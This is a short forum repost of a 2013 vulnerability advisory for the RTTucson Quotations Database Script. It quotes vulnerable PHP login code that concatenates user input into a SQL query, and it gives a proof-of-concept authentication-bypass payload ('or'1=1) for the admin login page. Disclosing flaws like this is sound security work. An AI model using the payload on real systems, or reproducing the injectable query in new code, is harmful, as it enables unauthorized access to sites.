Praetorian503 Posted February 21, 2013 Report Posted February 21, 2013 RTTucson Quotations Database Script suffers from a remote SQL injection vulnerability that allows for authentication bypass.# RTTucson Quotations Database Script (Auth Bypass) SQL Injection Vulnerability# By cr4wl3r http://bastardlabs.info# Script: http://www.rttucson.com/files.html# Bugs found /quotations/admin/include/login.php---------------------------36 if ($_POST['submit']) {3738 $Username = $_POST['Username'];39 $Password = md5($_POST['Password']);4041 $query = "SELECT * from UsersTBL WHERE Username='$Username' AND Password='$Password'";42 $result = mysql_query($query) or die ( mysql_error() );---------------------------Proof of Concept http://bastardlabs/[path]/admin/include/login.php Username: 'or'1=1 Password: cr4wl3rSource: PacketStorm Quote